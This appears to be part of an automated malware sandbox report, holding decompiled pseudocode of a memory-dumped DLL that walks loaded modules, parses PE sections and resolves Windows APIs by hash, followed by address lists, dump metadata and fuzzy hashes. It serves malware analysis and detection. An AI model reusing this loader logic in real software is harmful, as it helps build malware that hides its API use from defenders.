												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6E9B361C(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6E9B1C30(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6E9ADFC0(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6E9ADFC0(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x1c6ef387;
									if(_t535[0x54] == 0x1c6ef387) {
										 *0x6e9bd20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x45b68b68;
										if(_t535[0x54] == 0x45b68b68) {
											 *0x6e9bd210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6E9AE8A8( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6E9B306C(0x60a28c5c, 0x522ec1f2, 0x60a28c5c, 0x60a28c5c);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6e9bd2e4 = 1;
					E6E9AF584( &(_t535[0x38]), 0);
					E6E9AF584( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6E9AF4BC( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6E9B306C(0x60a28c5c, 0xe7942190, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6E9AF828( &(_t535[0xc]), E6E9AF4CC( &(_t535[8])) + 0x14);
								_t369 = E6E9AF4BC( &(_t535[0xc]), E6E9AF4CC( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6E9AF654( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6E9AF584( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6E9AF654( &(_t535[8]));
							E6E9AF654( &(_t535[0x164]));
							E6E9AF584( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6E9AF584( &(_t535[0x20]), 0);
							_push(0x60a28c5c);
							_t289 = E6E9B1D34(0x60a28c5c);
							_t290 = E6E9B12EC( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6E9B1C6C( &(_t535[0x164]), 0x60a28c5c);
							_t518 =  &(_t535[0x178]);
							E6E9AD014( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6E9B5CD4( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6E9B5D08( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6E9B8E08( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6E9AF654( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6E9ABB44( &(_t535[0x110]));
							}
							E6E9ACFDC( &(_t535[0x104]));
							E6E9ACFDC(_t518);
							E6E9ACFDC( &(_t535[0x15c]));
							E6E9ACFDC( &(_t535[0x154]));
							E6E9B90EC( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6E9AF618( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6E9B90B0( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6E9AF4BC( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6E9AF4CC( &(_t535[0x44]));
								_t519 =  *(0x6e9bbd40 + _t381 * 4);
								_t531 = E6E9B907C( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6E9B87E8( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6E9AF4CC( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6E9AF4DC( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6E9AF4CC( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6E9AF828( &(_t535[0x20]), E6E9AF4CC( &(_t535[0x1c])) + 8);
										E6E9AF4BC( &(_t535[0x20]), E6E9AF4CC( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6E9B317C(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6E9AF828( &(_t535[0x48]), _t535[0x70]);
									E6E9B317C(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6E9AF840( &(_t535[0x44]), _t563);
									E6E9AF840( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6E9B913C( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6E9B9104( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6E9AF654( &(_t535[0x144]));
									E6E9AF654( &(_t535[0x134]));
									goto L38;
								}
								 *0x6e9bd2ec =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6E9AF654( &(_t535[0x11c]));
							E6E9B8E68(_t381,  &(_t535[0xd8]));
							E6E9AF654( &(_t535[0x1c]));
							E6E9AF654( &(_t535[0x44]));
							E6E9AF654( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6E9AF4BC( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6E9AF828( &(_t535[0x38]), E6E9AF4CC( &(_t535[0x34])) + 0x14);
							_t347 = E6E9AF4BC( &(_t535[0x38]), E6E9AF4CC( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6E9AF4BC( &(_t535[0xc]), _t62);
						_t455 = E6E9AF4BC( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}








































































                                                                                                                                                  0x6e9b1448
                                                                                                                                                  0x6e9b144f
                                                                                                                                                  0x6e9b1452
                                                                                                                                                  0x6e9b1459
                                                                                                                                                  0x6e9b1bdb
                                                                                                                                                  0x6e9b1bdb
                                                                                                                                                  0x6e9b145f
                                                                                                                                                  0x6e9b146a
                                                                                                                                                  0x6e9b19a9
                                                                                                                                                  0x6e9b19ad
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1c2c
                                                                                                                                                  0x6e9b19b3
                                                                                                                                                  0x6e9b19b6
                                                                                                                                                  0x6e9b19b9
                                                                                                                                                  0x6e9b19c3
                                                                                                                                                  0x6e9b19d2
                                                                                                                                                  0x6e9b19d4
                                                                                                                                                  0x6e9b19db
                                                                                                                                                  0x6e9b1bc5
                                                                                                                                                  0x6e9b1bc7
                                                                                                                                                  0x6e9b1bca
                                                                                                                                                  0x6e9b1bce
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1bce
                                                                                                                                                  0x6e9b19ea
                                                                                                                                                  0x6e9b19f5
                                                                                                                                                  0x6e9b19fc
                                                                                                                                                  0x6e9b19ff
                                                                                                                                                  0x6e9b1a01
                                                                                                                                                  0x6e9b1a04
                                                                                                                                                  0x6e9b1a07
                                                                                                                                                  0x6e9b1a0d
                                                                                                                                                  0x6e9b1a1b
                                                                                                                                                  0x6e9b1a2b
                                                                                                                                                  0x6e9b1a50
                                                                                                                                                  0x6e9b1a61
                                                                                                                                                  0x6e9b1a64
                                                                                                                                                  0x6e9b1a66
                                                                                                                                                  0x6e9b1aca
                                                                                                                                                  0x6e9b1acd
                                                                                                                                                  0x6e9b1acd
                                                                                                                                                  0x6e9b1acf
                                                                                                                                                  0x6e9b1ad2
                                                                                                                                                  0x6e9b1ad6
                                                                                                                                                  0x6e9b1ad6
                                                                                                                                                  0x6e9b1ada
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1ae7
                                                                                                                                                  0x6e9b1aed
                                                                                                                                                  0x6e9b1b21
                                                                                                                                                  0x6e9b1b27
                                                                                                                                                  0x6e9b1b29
                                                                                                                                                  0x6e9b1bf8
                                                                                                                                                  0x6e9b1c00
                                                                                                                                                  0x6e9b1c03
                                                                                                                                                  0x6e9b1c05
                                                                                                                                                  0x6e9b1c1c
                                                                                                                                                  0x6e9b1c1c
                                                                                                                                                  0x6e9b1c07
                                                                                                                                                  0x6e9b1c0b
                                                                                                                                                  0x6e9b1c10
                                                                                                                                                  0x6e9b1c10
                                                                                                                                                  0x6e9b1c1e
                                                                                                                                                  0x6e9b1c24
                                                                                                                                                  0x6e9b1b43
                                                                                                                                                  0x6e9b1b43
                                                                                                                                                  0x6e9b1b45
                                                                                                                                                  0x6e9b1b45
                                                                                                                                                  0x6e9b1b47
                                                                                                                                                  0x6e9b1b47
                                                                                                                                                  0x6e9b1b4c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1b4e
                                                                                                                                                  0x6e9b1b4f
                                                                                                                                                  0x6e9b1b52
                                                                                                                                                  0x6e9b1b55
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1b61
                                                                                                                                                  0x6e9b1b64
                                                                                                                                                  0x6e9b1b66
                                                                                                                                                  0x6e9b1b7d
                                                                                                                                                  0x6e9b1b7d
                                                                                                                                                  0x6e9b1b68
                                                                                                                                                  0x6e9b1b6c
                                                                                                                                                  0x6e9b1b71
                                                                                                                                                  0x6e9b1b71
                                                                                                                                                  0x6e9b1b8a
                                                                                                                                                  0x6e9b1b8d
                                                                                                                                                  0x6e9b1b96
                                                                                                                                                  0x6e9b1b99
                                                                                                                                                  0x6e9b1bbc
                                                                                                                                                  0x6e9b1bc0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1bc0
                                                                                                                                                  0x6e9b1ba1
                                                                                                                                                  0x6e9b1ba1
                                                                                                                                                  0x6e9b1bad
                                                                                                                                                  0x6e9b1bb0
                                                                                                                                                  0x6e9b1bb9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1bb9
                                                                                                                                                  0x6e9b1b2f
                                                                                                                                                  0x6e9b1b3f
                                                                                                                                                  0x6e9b1b3f
                                                                                                                                                  0x6e9b1b41
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1b37
                                                                                                                                                  0x6e9b1b39
                                                                                                                                                  0x6e9b1b39
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1b3f
                                                                                                                                                  0x6e9b1aef
                                                                                                                                                  0x6e9b1af7
                                                                                                                                                  0x6e9b1b17
                                                                                                                                                  0x6e9b1af9
                                                                                                                                                  0x6e9b1af9
                                                                                                                                                  0x6e9b1b01
                                                                                                                                                  0x6e9b1b0a
                                                                                                                                                  0x6e9b1b0a
                                                                                                                                                  0x6e9b1b01
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1af7
                                                                                                                                                  0x6e9b1a68
                                                                                                                                                  0x6e9b1a6f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1a7c
                                                                                                                                                  0x6e9b1a82
                                                                                                                                                  0x6e9b1a87
                                                                                                                                                  0x6e9b1a8e
                                                                                                                                                  0x6e9b1a92
                                                                                                                                                  0x6e9b1aa7
                                                                                                                                                  0x6e9b1aa9
                                                                                                                                                  0x6e9b1aab
                                                                                                                                                  0x6e9b1ab1
                                                                                                                                                  0x6e9b1abf
                                                                                                                                                  0x6e9b1abf
                                                                                                                                                  0x6e9b1ac5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1ac5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1a0f
                                                                                                                                                  0x6e9b1a0f
                                                                                                                                                  0x6e9b1a0f
                                                                                                                                                  0x6e9b1a10
                                                                                                                                                  0x6e9b1a13
                                                                                                                                                  0x6e9b1a17
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1a2d
                                                                                                                                                  0x6e9b1a30
                                                                                                                                                  0x6e9b1a33
                                                                                                                                                  0x6e9b1a3c
                                                                                                                                                  0x6e9b1a3f
                                                                                                                                                  0x6e9b1a40
                                                                                                                                                  0x6e9b1a42
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b147d
                                                                                                                                                  0x6e9b147f
                                                                                                                                                  0x6e9b1484
                                                                                                                                                  0x6e9b148f
                                                                                                                                                  0x6e9b149d
                                                                                                                                                  0x6e9b14b0
                                                                                                                                                  0x6e9b14bd
                                                                                                                                                  0x6e9b14c6
                                                                                                                                                  0x6e9b14ca
                                                                                                                                                  0x6e9b14ce
                                                                                                                                                  0x6e9b1516
                                                                                                                                                  0x6e9b1516
                                                                                                                                                  0x6e9b1518
                                                                                                                                                  0x6e9b151f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1538
                                                                                                                                                  0x6e9b1540
                                                                                                                                                  0x6e9b1544
                                                                                                                                                  0x6e9b1559
                                                                                                                                                  0x6e9b155d
                                                                                                                                                  0x6e9b1561
                                                                                                                                                  0x6e9b156a
                                                                                                                                                  0x6e9b1570
                                                                                                                                                  0x6e9b1573
                                                                                                                                                  0x6e9b1577
                                                                                                                                                  0x6e9b157f
                                                                                                                                                  0x6e9b1581
                                                                                                                                                  0x6e9b1585
                                                                                                                                                  0x6e9b158c
                                                                                                                                                  0x6e9b1595
                                                                                                                                                  0x6e9b1595
                                                                                                                                                  0x6e9b1599
                                                                                                                                                  0x6e9b15ae
                                                                                                                                                  0x6e9b15c4
                                                                                                                                                  0x6e9b15d1
                                                                                                                                                  0x6e9b15d2
                                                                                                                                                  0x6e9b15d2
                                                                                                                                                  0x6e9b15d4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b158e
                                                                                                                                                  0x6e9b158e
                                                                                                                                                  0x6e9b158e
                                                                                                                                                  0x6e9b158f
                                                                                                                                                  0x6e9b1590
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b158e
                                                                                                                                                  0x6e9b1553
                                                                                                                                                  0x6e9b1557
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b15d8
                                                                                                                                                  0x6e9b15d8
                                                                                                                                                  0x6e9b15d9
                                                                                                                                                  0x6e9b15dc
                                                                                                                                                  0x6e9b15e6
                                                                                                                                                  0x6e9b15e6
                                                                                                                                                  0x6e9b15ea
                                                                                                                                                  0x6e9b15f1
                                                                                                                                                  0x6e9b164c
                                                                                                                                                  0x6e9b1651
                                                                                                                                                  0x6e9b16a4
                                                                                                                                                  0x6e9b16a4
                                                                                                                                                  0x6e9b16a8
                                                                                                                                                  0x6e9b16ac
                                                                                                                                                  0x6e9b14d6
                                                                                                                                                  0x6e9b14d9
                                                                                                                                                  0x6e9b14de
                                                                                                                                                  0x6e9b14e4
                                                                                                                                                  0x6e9b14e7
                                                                                                                                                  0x6e9b14ee
                                                                                                                                                  0x6e9b14f2
                                                                                                                                                  0x6e9b14f9
                                                                                                                                                  0x6e9b1502
                                                                                                                                                  0x6e9b1506
                                                                                                                                                  0x6e9b150a
                                                                                                                                                  0x6e9b1510
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1510
                                                                                                                                                  0x6e9b16b6
                                                                                                                                                  0x6e9b16c2
                                                                                                                                                  0x6e9b16cd
                                                                                                                                                  0x6e9b16d4
                                                                                                                                                  0x6e9b16dd
                                                                                                                                                  0x6e9b16e7
                                                                                                                                                  0x6e9b16e8
                                                                                                                                                  0x6e9b16f6
                                                                                                                                                  0x6e9b16fb
                                                                                                                                                  0x6e9b16fc
                                                                                                                                                  0x6e9b1709
                                                                                                                                                  0x6e9b170e
                                                                                                                                                  0x6e9b1720
                                                                                                                                                  0x6e9b1725
                                                                                                                                                  0x6e9b172a
                                                                                                                                                  0x6e9b173c
                                                                                                                                                  0x6e9b174e
                                                                                                                                                  0x6e9b1753
                                                                                                                                                  0x6e9b175e
                                                                                                                                                  0x6e9b1765
                                                                                                                                                  0x6e9b176a
                                                                                                                                                  0x6e9b1772
                                                                                                                                                  0x6e9b177b
                                                                                                                                                  0x6e9b177b
                                                                                                                                                  0x6e9b1787
                                                                                                                                                  0x6e9b178e
                                                                                                                                                  0x6e9b179a
                                                                                                                                                  0x6e9b17a6
                                                                                                                                                  0x6e9b17b4
                                                                                                                                                  0x6e9b17c5
                                                                                                                                                  0x6e9b17cc
                                                                                                                                                  0x6e9b17d1
                                                                                                                                                  0x6e9b17da
                                                                                                                                                  0x6e9b17df
                                                                                                                                                  0x6e9b17e1
                                                                                                                                                  0x6e9b17e5
                                                                                                                                                  0x6e9b17e9
                                                                                                                                                  0x6e9b17f6
                                                                                                                                                  0x6e9b1803
                                                                                                                                                  0x6e9b1807
                                                                                                                                                  0x6e9b181b
                                                                                                                                                  0x6e9b181f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1834
                                                                                                                                                  0x6e9b1836
                                                                                                                                                  0x6e9b183e
                                                                                                                                                  0x6e9b183b
                                                                                                                                                  0x6e9b183b
                                                                                                                                                  0x6e9b183b
                                                                                                                                                  0x6e9b1842
                                                                                                                                                  0x6e9b1844
                                                                                                                                                  0x6e9b184a
                                                                                                                                                  0x6e9b1850
                                                                                                                                                  0x6e9b18ac
                                                                                                                                                  0x6e9b18b5
                                                                                                                                                  0x6e9b18b9
                                                                                                                                                  0x6e9b18c6
                                                                                                                                                  0x6e9b18cf
                                                                                                                                                  0x6e9b18d4
                                                                                                                                                  0x6e9b18d8
                                                                                                                                                  0x6e9b18db
                                                                                                                                                  0x6e9b193c
                                                                                                                                                  0x6e9b1952
                                                                                                                                                  0x6e9b195d
                                                                                                                                                  0x6e9b195e
                                                                                                                                                  0x6e9b195f
                                                                                                                                                  0x6e9b1963
                                                                                                                                                  0x6e9b1966
                                                                                                                                                  0x6e9b1be6
                                                                                                                                                  0x6e9b1be9
                                                                                                                                                  0x6e9b1be9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1966
                                                                                                                                                  0x6e9b18e5
                                                                                                                                                  0x6e9b18f5
                                                                                                                                                  0x6e9b18fe
                                                                                                                                                  0x6e9b1907
                                                                                                                                                  0x6e9b1910
                                                                                                                                                  0x6e9b1911
                                                                                                                                                  0x6e9b1912
                                                                                                                                                  0x6e9b1917
                                                                                                                                                  0x6e9b191f
                                                                                                                                                  0x6e9b1927
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1929
                                                                                                                                                  0x6e9b1859
                                                                                                                                                  0x6e9b185e
                                                                                                                                                  0x6e9b1862
                                                                                                                                                  0x6e9b1862
                                                                                                                                                  0x6e9b1866
                                                                                                                                                  0x6e9b1869
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b188a
                                                                                                                                                  0x6e9b188c
                                                                                                                                                  0x6e9b1890
                                                                                                                                                  0x6e9b1892
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1894
                                                                                                                                                  0x6e9b189b
                                                                                                                                                  0x6e9b18a7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b18a7
                                                                                                                                                  0x6e9b186e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b196c
                                                                                                                                                  0x6e9b196c
                                                                                                                                                  0x6e9b196d
                                                                                                                                                  0x6e9b197d
                                                                                                                                                  0x6e9b1989
                                                                                                                                                  0x6e9b1992
                                                                                                                                                  0x6e9b199b
                                                                                                                                                  0x6e9b19a4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b19a4
                                                                                                                                                  0x6e9b1653
                                                                                                                                                  0x6e9b1655
                                                                                                                                                  0x6e9b1657
                                                                                                                                                  0x6e9b165c
                                                                                                                                                  0x6e9b1661
                                                                                                                                                  0x6e9b1674
                                                                                                                                                  0x6e9b168a
                                                                                                                                                  0x6e9b1693
                                                                                                                                                  0x6e9b1694
                                                                                                                                                  0x6e9b1694
                                                                                                                                                  0x6e9b1696
                                                                                                                                                  0x6e9b1697
                                                                                                                                                  0x6e9b169a
                                                                                                                                                  0x6e9b169e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1657
                                                                                                                                                  0x6e9b15f3
                                                                                                                                                  0x6e9b15fd
                                                                                                                                                  0x6e9b15fe
                                                                                                                                                  0x6e9b15fe
                                                                                                                                                  0x6e9b160b
                                                                                                                                                  0x6e9b1617
                                                                                                                                                  0x6e9b1619
                                                                                                                                                  0x6e9b161b
                                                                                                                                                  0x6e9b161f
                                                                                                                                                  0x6e9b162f
                                                                                                                                                  0x6e9b162f
                                                                                                                                                  0x6e9b1636
                                                                                                                                                  0x6e9b1639
                                                                                                                                                  0x6e9b163a
                                                                                                                                                  0x6e9b163e
                                                                                                                                                  0x6e9b1648
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1648

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a5aa6b57b44497375c336734a7832ac7c2af4f2859f458fd2d6cc4add6eacc70
                                                                                                                                                  • Instruction ID: cb631ac18479d1c2f9435e830321b9a8f95445cb60604c3e98de669b85d57984
                                                                                                                                                  • Opcode Fuzzy Hash: a5aa6b57b44497375c336734a7832ac7c2af4f2859f458fd2d6cc4add6eacc70
                                                                                                                                                  • Instruction Fuzzy Hash: 67326B705083458FD714DFA9C890AEBB7E8BFA5308F108D2DE595872A1EB70E949CF52
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6E9A6D0C, Relevance: .0, Instructions: 36COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E6E9A6D0C() {

				 *0x6e9bd280 = GetUserNameW;
				 *0x6E9BD284 = MessageBoxW;
				 *0x6E9BD288 = GetLastError;
				 *0x6E9BD28C = CreateFileA;
				 *0x6E9BD290 = DebugBreak;
				 *0x6E9BD294 = FlushFileBuffers;
				 *0x6E9BD298 = FreeEnvironmentStringsA;
				 *0x6E9BD29C = GetConsoleOutputCP;
				 *0x6E9BD2A0 = GetEnvironmentStrings;
				 *0x6E9BD2A4 = GetLocaleInfoA;
				 *0x6E9BD2A8 = GetStartupInfoA;
				 *0x6E9BD2AC = GetStringTypeA;
				 *0x6E9BD2B0 = HeapValidate;
				 *0x6E9BD2B4 = IsBadReadPtr;
				 *0x6E9BD2B8 = LCMapStringA;
				 *0x6E9BD2BC = LoadLibraryA;
				 *0x6E9BD2C0 = OutputDebugStringA;
				return 0x6e9bd280;
			}



                                                                                                                                                  0x6e9a6d1d
                                                                                                                                                  0x6e9a6d25
                                                                                                                                                  0x6e9a6d28
                                                                                                                                                  0x6e9a6d37
                                                                                                                                                  0x6e9a6d3a
                                                                                                                                                  0x6e9a6d49
                                                                                                                                                  0x6e9a6d4c
                                                                                                                                                  0x6e9a6d5b
                                                                                                                                                  0x6e9a6d5e
                                                                                                                                                  0x6e9a6d6d
                                                                                                                                                  0x6e9a6d70
                                                                                                                                                  0x6e9a6d7f
                                                                                                                                                  0x6e9a6d82
                                                                                                                                                  0x6e9a6d91
                                                                                                                                                  0x6e9a6d94
